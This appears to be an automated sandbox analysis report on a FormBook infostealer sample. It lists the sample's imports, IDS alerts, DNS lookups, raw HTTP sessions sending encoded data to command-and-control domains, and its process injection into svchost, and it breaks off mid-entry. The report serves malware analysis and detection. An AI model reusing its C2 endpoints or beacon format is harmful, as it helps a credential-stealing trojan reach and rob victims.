SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHGetFolderPathW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-13T12:03:17.133067+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49464 | 3.33.130.190 | 80 | TCP
2024-09-13T12:03:33.505785+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49466 | 13.228.81.39 | 80 | TCP
2024-09-13T12:03:36.168673+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49467 | 13.228.81.39 | 80 | TCP
2024-09-13T12:03:38.651818+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49468 | 13.228.81.39 | 80 | TCP
2024-09-13T12:03:41.188431+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49469 | 13.228.81.39 | 80 | TCP
2024-09-13T12:04:05.753743+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 61307 | 66.81.203.10 | 80 | TCP
2024-09-13T12:04:08.333594+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 61308 | 66.81.203.10 | 80 | TCP
2024-09-13T12:04:14.765281+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 61309 | 103.42.108.46 | 80 | TCP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 13, 2024 12:03:11.618417025 CEST | 192.168.2.5 | 1.1.1.1 | 0xb7a1 | Standard query (0) | www.linkbasic.net | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:03:16.640947104 CEST | 192.168.2.5 | 1.1.1.1 | 0x8d16 | Standard query (0) | www.chamadaslotgiris.net | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:03:32.172318935 CEST | 192.168.2.5 | 1.1.1.1 | 0xc490 | Standard query (0) | www.masteriocp.online | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:03:46.203438044 CEST | 192.168.2.5 | 1.1.1.1 | 0x6f42 | Standard query (0) | www.mediaplug.biz | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:03:47.216095924 CEST | 192.168.2.5 | 1.1.1.1 | 0x6f42 | Standard query (0) | www.mediaplug.biz | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:03:48.215483904 CEST | 192.168.2.5 | 1.1.1.1 | 0x6f42 | Standard query (0) | www.mediaplug.biz | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:03:50.285080910 CEST | 192.168.2.5 | 1.1.1.1 | 0x6f42 | Standard query (0) | www.mediaplug.biz | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:03:53.129156113 CEST | 192.168.2.5 | 1.1.1.1 | 0xb2e6 | Standard query (0) | www.mediaplug.biz | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:03:54.121735096 CEST | 192.168.2.5 | 1.1.1.1 | 0xb2e6 | Standard query (0) | www.mediaplug.biz | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:04:01.545541048 CEST | 192.168.2.5 | 1.1.1.1 | 0xdfd7 | Standard query (0) | www.mediaplug.biz | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:04:02.555922985 CEST | 192.168.2.5 | 1.1.1.1 | 0xdfd7 | Standard query (0) | www.mediaplug.biz | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:04:03.559439898 CEST | 192.168.2.5 | 1.1.1.1 | 0xdfd7 | Standard query (0) | www.mediaplug.biz | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:04:13.362459898 CEST | 192.168.2.5 | 1.1.1.1 | 0x6745 | Standard query (0) | www.independent200.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 13, 2024 12:03:11.628772020 CEST | 1.1.1.1 | 192.168.2.5 | 0xb7a1 | Name error (3) | www.linkbasic.net | none | none | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:03:16.657495975 CEST | 1.1.1.1 | 192.168.2.5 | 0x8d16 | No error (0) | www.chamadaslotgiris.net | chamadaslotgiris.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 13, 2024 12:03:16.657495975 CEST | 1.1.1.1 | 192.168.2.5 | 0x8d16 | No error (0) | chamadaslotgiris.net | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:03:16.657495975 CEST | 1.1.1.1 | 192.168.2.5 | 0x8d16 | No error (0) | chamadaslotgiris.net | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:03:32.597338915 CEST | 1.1.1.1 | 192.168.2.5 | 0xc490 | No error (0) | www.masteriocp.online | dns.ladipage.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 13, 2024 12:03:32.597338915 CEST | 1.1.1.1 | 192.168.2.5 | 0xc490 | No error (0) | dns.ladipage.com | | 13.228.81.39 | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:03:32.597338915 CEST | 1.1.1.1 | 192.168.2.5 | 0xc490 | No error (0) | dns.ladipage.com | | 18.139.62.226 | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:03:32.597338915 CEST | 1.1.1.1 | 192.168.2.5 | 0xc490 | No error (0) | dns.ladipage.com | | 54.179.173.60 | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:03:52.027873993 CEST | 1.1.1.1 | 192.168.2.5 | 0x6f42 | Server failure (2) | www.mediaplug.biz | none | none | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:03:52.027889013 CEST | 1.1.1.1 | 192.168.2.5 | 0x6f42 | Server failure (2) | www.mediaplug.biz | none | none | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:03:52.027896881 CEST | 1.1.1.1 | 192.168.2.5 | 0x6f42 | Server failure (2) | www.mediaplug.biz | none | none | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:03:52.027966022 CEST | 1.1.1.1 | 192.168.2.5 | 0x6f42 | Server failure (2) | www.mediaplug.biz | none | none | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:03:59.045521021 CEST | 1.1.1.1 | 192.168.2.5 | 0xb2e6 | Server failure (2) | www.mediaplug.biz | none | none | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:04:04.714510918 CEST | 1.1.1.1 | 192.168.2.5 | 0xdfd7 | No error (0) | www.mediaplug.biz | | 66.81.203.10 | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:04:04.714510918 CEST | 1.1.1.1 | 192.168.2.5 | 0xdfd7 | No error (0) | www.mediaplug.biz | | 66.81.203.135 | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:04:04.714510918 CEST | 1.1.1.1 | 192.168.2.5 | 0xdfd7 | No error (0) | www.mediaplug.biz | | 66.81.203.200 | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:04:04.714560032 CEST | 1.1.1.1 | 192.168.2.5 | 0xdfd7 | No error (0) | www.mediaplug.biz | | 66.81.203.10 | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:04:04.714560032 CEST | 1.1.1.1 | 192.168.2.5 | 0xdfd7 | No error (0) | www.mediaplug.biz | | 66.81.203.135 | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:04:04.714560032 CEST | 1.1.1.1 | 192.168.2.5 | 0xdfd7 | No error (0) | www.mediaplug.biz | | 66.81.203.200 | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:04:04.715270996 CEST | 1.1.1.1 | 192.168.2.5 | 0xdfd7 | No error (0) | www.mediaplug.biz | | 66.81.203.10 | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:04:04.715270996 CEST | 1.1.1.1 | 192.168.2.5 | 0xdfd7 | No error (0) | www.mediaplug.biz | | 66.81.203.135 | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:04:04.715270996 CEST | 1.1.1.1 | 192.168.2.5 | 0xdfd7 | No error (0) | www.mediaplug.biz | | 66.81.203.200 | A (IP address) | IN (0x0001) | false
Sep 13, 2024 12:04:13.881644011 CEST | 1.1.1.1 | 192.168.2.5 | 0x6745 | No error (0) | www.independent200.org | | 103.42.108.46 | A (IP address) | IN (0x0001) | false
                          • www.chamadaslotgiris.net
                          • www.masteriocp.online
                          • www.mediaplug.biz
                          • www.independent200.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49464 | 3.33.130.190 | 80 | 2136 | C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
Timestamp | Bytes transferred | Direction | Data
Sep 13, 2024 12:03:16.676466942 CEST | 529 | OUT | GET /gqyt/?GHSh-Tth=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&1Hqh=_NtDd HTTP/1.1
                          Host: www.chamadaslotgiris.net
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US
                          Connection: close
                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Sep 13, 2024 12:03:17.132409096 CEST | 407 | IN | HTTP/1.1 200 OK
                          Server: openresty
                          Date: Fri, 13 Sep 2024 10:03:17 GMT
                          Content-Type: text/html
                          Content-Length: 267
                          Connection: close
                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GHSh-Tth=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&1Hqh=_NtDd"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49466 | 13.228.81.39 | 80 | 2136 | C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
Timestamp | Bytes transferred | Direction | Data
Sep 13, 2024 12:03:32.623886108 CEST | 797 | OUT | POST /p5rq/ HTTP/1.1
                          Host: www.masteriocp.online
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US
                          Connection: close
                          Content-Length: 209
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: no-cache
                          Origin: http://www.masteriocp.online
                          Referer: http://www.masteriocp.online/p5rq/
                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                          Data Ascii: GHSh-Tth=cwFSIiCmOGbNVA2mmxmaUHIxhLptwU5r8ryoHkyvpzJ3v/Atw7CakxJyvARehLJzzHaMMPaUTfZnxYK/eeA2Xm0aZyF/EPd+v8NkmHcROAB2HJmThdBptFSky1FV7J/TsZrwTogefpd8a52n+7GCR8sNzM0VKmn7uQZolNwLOa+urCzO8jpe7jxx0i4fnuCSvVsuHVI=
Sep 13, 2024 12:03:33.505559921 CEST | 368 | IN | HTTP/1.1 301 Moved Permanently
                          Server: openresty
                          Date: Fri, 13 Sep 2024 10:03:33 GMT
                          Content-Type: text/html
                          Content-Length: 166
                          Connection: close
                          Location: https://www.masteriocp.online/p5rq/
                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49467 | 13.228.81.39 | 80 | 2136 | C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
Timestamp | Bytes transferred | Direction | Data
Sep 13, 2024 12:03:35.172633886 CEST | 817 | OUT | POST /p5rq/ HTTP/1.1
                          Host: www.masteriocp.online
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US
                          Connection: close
                          Content-Length: 229
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: no-cache
                          Origin: http://www.masteriocp.online
                          Referer: http://www.masteriocp.online/p5rq/
                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                          Data Ascii: GHSh-Tth=cwFSIiCmOGbNHT+mkSOaF3I2kLptpE5v8r2oHl3koHl3va8tiuuathJyggRHvrJozGmEMPWUTfNnxYa/dpc5UW0YQSF5Lvd+v8NkmHI3OEl2H6uTuZdquFSnmlFV/J+asZqdTtIkfvZ8a4Gn/qGBb8sP3M1HOl2g2xV+4vpcZ9aXjUekmBh2oDdJkxwo2ej7128eZCeZ1K6y45qYud0sTwIv95oN
Sep 13, 2024 12:03:36.168555975 CEST | 368 | IN | HTTP/1.1 301 Moved Permanently
                          Server: openresty
                          Date: Fri, 13 Sep 2024 10:03:35 GMT
                          Content-Type: text/html
                          Content-Length: 166
                          Connection: close
                          Location: https://www.masteriocp.online/p5rq/
                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49468 | 13.228.81.39 | 80 | 2136 | C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
Timestamp | Bytes transferred | Direction | Data
Sep 13, 2024 12:03:37.729015112 CEST | 1834 | OUT | POST /p5rq/ HTTP/1.1
                          Host: www.masteriocp.online
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US
                          Connection: close
                          Content-Length: 1245
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: no-cache
                          Origin: http://www.masteriocp.online
                          Referer: http://www.masteriocp.online/p5rq/
                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                          Data Ascii: GHSh-Tth=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 [TRUNCATED]
Sep 13, 2024 12:03:38.651642084 CEST | 368 | IN | HTTP/1.1 301 Moved Permanently
                          Server: openresty
                          Date: Fri, 13 Sep 2024 10:03:38 GMT
                          Content-Type: text/html
                          Content-Length: 166
                          Connection: close
                          Location: https://www.masteriocp.online/p5rq/
                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49469 | 13.228.81.39 | 80 | 2136 | C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
Timestamp | Bytes transferred | Direction | Data
Sep 13, 2024 12:03:40.266074896 CEST | 526 | OUT | GET /p5rq/?GHSh-Tth=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&1Hqh=_NtDd HTTP/1.1
                          Host: www.masteriocp.online
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US
                          Connection: close
                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Sep 13, 2024 12:03:41.188174963 CEST | 521 | IN | HTTP/1.1 301 Moved Permanently
                          Server: openresty
                          Date: Fri, 13 Sep 2024 10:03:41 GMT
                          Content-Type: text/html
                          Content-Length: 166
                          Connection: close
                          Location: https://www.masteriocp.online/p5rq/?GHSh-Tth=RytyLV2sDE3KAjid6ijyBws804BTuHo2xv60Q0DZuFoqqvUh/Zvb/zR4+xNnv9lNk3zYZu+tANFIvcmMVMI5BxIUOARFC/F7kb9hzkdtOwUlduKX5dZAlA2NzH1X/KLd6Q==&1Hqh=_NtDd
                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 61307 | 66.81.203.10 | 80 | 2136 | C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
Timestamp | Bytes transferred | Direction | Data
Sep 13, 2024 12:04:05.071877003 CEST | 1822 | OUT | POST /osde/ HTTP/1.1
                          Host: www.mediaplug.biz
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US
                          Connection: close
                          Content-Length: 1245
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: no-cache
                          Origin: http://www.mediaplug.biz
                          Referer: http://www.mediaplug.biz/osde/
                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                          Data Ascii: GHSh-Tth=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 [TRUNCATED]
Sep 13, 2024 12:04:05.753561020 CEST | 727 | IN | HTTP/1.1 405 Not Allowed
                          Server: nginx/1.14.2
                          Date: Fri, 13 Sep 2024 10:04:05 GMT
                          Content-Type: text/html
                          Content-Length: 575
                          Connection: close
                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.14.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 61308 | 66.81.203.10 | 80 | 2136 | C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
Timestamp | Bytes transferred | Direction | Data
Sep 13, 2024 12:04:07.608773947 CEST | 522 | OUT | GET /osde/?GHSh-Tth=RWxN1EBNqsrI97gRZZLgxxJS1816+Tom3eCTWsUjqsqAz5HjDo5OrFUtMmzwWkvzE1VCadoWcR1nh8rv/P1sPWqJU3bviStab5pw4zunthcPnIDJoH7elLKb+pwDrPWt7Q==&1Hqh=_NtDd HTTP/1.1
                          Host: www.mediaplug.biz
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US
                          Connection: close
                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Sep 13, 2024 12:04:08.333240032 CEST | 1236 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.14.2
                          Date: Fri, 13 Sep 2024 10:04:08 GMT
                          Content-Type: text/html
                          Content-Length: 1432
                          Last-Modified: Tue, 14 May 2024 12:20:23 GMT
                          Connection: close
                          ETag: "66435707-598"
                          Accept-Ranges: bytes
                          Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height: 100%; width: 100%; margin: 0; padding: 0; border: 0; outline: 0; font-size: 100%; vertical-align: baseline; background: transparent; } /*body { overflow:hidden; }*/ </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div style="text-align: center;"> <p>This domain is pending renewal or has expired. Please contact the domain provider with questions.</p></div> <div id="partner"></div> <script type="text/j
Sep 13, 2024 12:04:08.333455086 CEST | 224 | IN | Data Raw: 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0d 0a 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61
                          Data Ascii: avascript"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'Skenzor22' + '/park.j
Sep 13, 2024 12:04:08.333486080 CEST | 206 | IN | Data Raw: 73 3f 62 65 66 6f 72 65 42 6f 64 79 45 6e 64 48 54 4d 4c 3d 25 33 43 70 25 33 45 54 68 69 73 2b 64 6f 6d 61 69 6e 2b 69 73 2b 70 65 6e 64 69 6e 67 2b 72 65 6e 65 77 61 6c 2b 6f 72 2b 68 61 73 2b 65 78 70 69 72 65 64 2e 2b 50 6c 65 61 73 65 2b 63
                          Data Ascii: s?beforeBodyEndHTML=%3Cp%3EThis+domain+is+pending+renewal+or+has+expired.+Please+contact+the+domain+provider+with+questions.%3C%2Fp%3E">' + '<\/script>' ) </script> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 61309 | 103.42.108.46 | 80 | 2136 | C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
Timestamp | Bytes transferred | Direction | Data
Sep 13, 2024 12:04:13.904946089 CEST | 800 | OUT | POST /yl6y/ HTTP/1.1
                          Host: www.independent200.org
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US
                          Connection: close
                          Content-Length: 209
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: no-cache
                          Origin: http://www.independent200.org
                          Referer: http://www.independent200.org/yl6y/
                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                          Data Ascii: GHSh-Tth=dNiLasFHVsc44+aNFBmfK/wsfbrEM8AJv0p9k+fe8dn3ZN7hTdRCas13WOCBaBTEdfMDeYANHnV9vov0JpBOAyVVTPT8HiUueV9oV2DPQPksp+0GDrfcaTVKEyXXQVCkgwqoafxNoRxLWToaxucVtAICcpWhBAi5Yq4S8+AdxUj/AS+vbi2mPxS4jKd4GHTU62unf44=
Sep 13, 2024 12:04:14.765163898 CEST | 154 | IN | HTTP/1.1 403 Forbidden
                          Content-Type: text/plain; charset=utf-8
                          Date: Fri, 13 Sep 2024 10:04:14 GMT
                          Content-Length: 11
                          Connection: close
                          Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                          Data Ascii: Bad Request


                          Target ID:0
                          Start time:06:02:06
                          Start date:13/09/2024
                          Path:C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe"
                          Imagebase:0x80000
                          File size:1'225'728 bytes
                          MD5 hash:52EF22AF5530FE6362D8638583866C7F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:2
                          Start time:06:02:07
                          Start date:13/09/2024
                          Path:C:\Windows\SysWOW64\svchost.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe"
                          Imagebase:0xe80000
                          File size:46'504 bytes
                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2584333644.0000000003160000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2583640738.0000000000380000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2583640738.0000000000380000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2584390096.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2584390096.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:06:02:49
                          Start date:13/09/2024
                          Path:C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe"
                          Imagebase:0x1c0000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3347630657.00000000035F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3347630657.00000000035F0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:false

                          Target ID:6
                          Start time:06:02:50
                          Start date:13/09/2024
                          Path:C:\Windows\SysWOW64\netbtugc.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                          Imagebase:0x20000
                          File size:22'016 bytes
                          MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
